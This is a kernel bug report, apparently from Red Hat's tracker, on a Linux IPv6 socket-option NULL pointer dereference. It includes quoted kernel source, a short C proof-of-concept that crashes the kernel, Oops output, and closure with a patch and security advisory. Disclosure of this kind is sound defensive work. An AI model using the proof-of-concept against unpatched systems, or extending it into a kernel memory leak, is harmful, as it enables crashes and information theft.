There is a NULL pointer dereference which can lead to an arbitray kernel memory leak, in the file net/ipv6/ipv6_sockglue.c : 340 case IPV6_2292PKTOPTIONS: 341 { 342 struct ipv6_txoptions *opt = NULL; [1] 343 struct msghdr msg; 344 struct flowi fl; 345 int junk; 346 347 fl.fl6_flowlabel = 0; 348 fl.oif = sk->sk_bound_dev_if; 349 340 if (optlen == 0) 341 goto update; [2] 377 update: 378 retv = 0; 379 if (inet_sk(sk)->is_icsk) { 380 if (opt) { ... 389 } 390 opt = xchg(&np->opt, opt); [3] 391 sk_dst_reset(sk); 392 } else { 393 write_lock(&sk->sk_dst_lock); 394 opt = xchg(&np->opt, opt); [4] 395 write_unlock(&sk->sk_dst_lock); 396 sk_dst_reset(sk); 397 } 819 case IPV6_DSTOPTS: 820 { 821 822 lock_sock(sk); 823 len = ipv6_getsockopt_sticky(sk, np->opt->hopopt, [5] 824 optval, len); 825 release_sock(sk); 826 return put_user(len, optlen); 827 } In the function do_ipv6_setsockopt(), if optname = IPV6_2292PKTOPTIONS and optlen = 0 [2], np->opt is set to NULL [3][4]. In the function do_ipv6_getsockopt(), if optname = IPV6_DSTOPTS, np->opt is dereferenced [5]. An attacker can read any portion of the kernel memory : ipv6_getsockopt_sticky() copies np->opt->hopopt to optavl which is an user buffer, and np->opt can be mmaped to NULL. Here is a program that reproduces the bug : #include <netinet/in.h> int main(int argc, char *argv[]) { int s; unsigned int optlen = 4; s = socket(AF_INET6, SOCK_STREAM, IPPROTO_TCP); setsockopt(s, IPPROTO_IPV6, 6, (void *)NULL, 0); getsockopt(s, IPPROTO_IPV6, 59, (void *)NULL, &optlen); return 0; } And the Oops output : [17183522.904000] BUG: unable to handle kernel NULL pointer dereference at virtual address 00000008 [17183522.904000] printing eip: [17183522.904000] f8eba4d4 [17183522.904000] *pde = 00000000 [17183522.904000] Oops: 0000 [#1] [17183522.904000] Modules linked in: nls_utf8 nls_cp437 vfat fat sg sd_mod usb_storage libusual binfmt_misc rfcomm hidp l2cap bluetooth fglrx speedstep_centr ino cpufreq_userspace cpufreq_stats freq_table cpufreq_powersave cpufreq_ondemand cpufreq_conservative video tc1100_wmi sbs sony_acpi pcc_acpi i2c_ec i2c_cor e hotkey dev_acpi button battery container ac asus_acpi dm_mod md_mod sr_mod sbp2 scsi_mod parport_pc lp parport ipv6 8139cp pcmcia 8139too joydev ipw2200 mi i ieee80211 ieee80211_crypt yenta_socket rsrc_nonstatic sdhci mmc_core tifm_7xx1 tifm_core tsdev pcmcia_core snd_intel8x0 snd_ac97_codec snd_ac97_bus snd_pcm _oss snd_mixer_oss snd_pcm snd_timer snd evdev intel_agp agpgart usbhid rtc soundcore snd_page_alloc shpchp pci_hotplug psmouse serio_raw ext3 jbd ohci1394 i eee1394 ehci_hcd uhci_hcd usbcore ide_generic ide_cd cdrom ide_disk piix generic thermal processor fan capability commoncap vesafb fbcon tileblit font bitbli t softcursor [17183522.904000] CPU: 0 [17183522.904000] EIP: 0060:[<f8eba4d4>] Tainted: P VLI [17183522.904000] EFLAGS: 00210286 (2.6.17-11-386 #2) [17183522.904000] EIP is at ipv6_getsockopt+0x4e4/0x6d0 [ipv6] [17183522.904000] eax: 00000000 ebx: d33d1b00 ecx: d33d1f18 edx: d33d1f18 [17183522.904000] esi: 00000000 edi: 00000029 ebp: 0000003b esp: dcd07d5c [17183522.904000] ds: 007b es: 007b ss: 0068 [17183522.904000] Process poc (pid: 5968, threadinfo=dcd06000 task=dbbb5540) [17183522.904000] Stack: 00000001 00000003 dfa794d8 00200286 d33d1f18 d2b8b3ec 00000004 00000006 [17183522.904000] c025a68b 00200296 00000000 e15f2440 d2b8b3ec 00200282 d33d1b00 00000000 [17183522.904000] d33d1b00 00000000 f8eba94b 00000000 00000000 dfed6000 f8c9a4ff 00000000 [17183522.904000] Call Trace: [17183522.904000] <c025a68b> lock_sock+0xab/0xc0 <f8eba94b> ipv6_setsockopt+0x16b/0xc40 [ipv6] [17183522.904000] <f8c92614> __ext3_journal_stop+0x24/0x50 [ext3] <c0179c74> __mark_inode_dirty+0x34/0x170 [17183522.904000] <c013c78b> do_generic_mapping_read+0x42b/0x540 <c0154f74> cache_alloc_refill+0x314/0x4d0 [17183522.904000] <c0288da6> tcp_getsockopt+0x36/0x2b0 <c016f0b7> d_alloc+0x27/0x190 [17183522.904000] <c016f059> d_instantiate+0x49/0x80 <f8eba7e0> ipv6_setsockopt+0x0/0xc40 [ipv6] [17183522.904000] <c0289966> tcp_setsockopt+0x36/0x370 <c0259de3> sock_common_getsockopt+0x23/0x30 [17183522.904000] <c025872e> sys_getsockopt+0x8e/0xc0 <c0259a44> sys_socketcall+0x234/0x280 [17183522.904000] <c02c7a00> do_page_fault+0x0/0x6e0 <c0102dbb> sysenter_past_esp+0x54/0x79 [17183522.904000] Code: ff 8b 4c 24 10 0f b6 41 45 c0 e8 02 83 e0 01 89 84 24 54 01 00 00 e9 ee fb ff ff 89 d8 31 f6 e8 13 01 3a c7 8b 54 24 10 8b 42 58 <8b> 50 08 85 d2 74 2c 0f b6 42 01 be f2 ff ff ff 8d 3c c5 08 00 [17183522.904000] EIP: [<f8eba4d4>] ipv6_getsockopt+0x4e4/0x6d0 [ipv6] SS:ESP 0068:dcd07d5c
A patch for this issue has been included in zstream build 2.6.18-8.1.2.el5.
verified with 2.6.18-8.1.3.el5.
An advisory has been issued which should help the problem described in this bug report. This report is therefore being closed with a resolution of ERRATA. For more information on the solution and/or where to find the updated files, please follow the link below. You may reopen this bug report if the solution does not work for you. http://rhn.redhat.com/errata/RHSA-2007-0169.html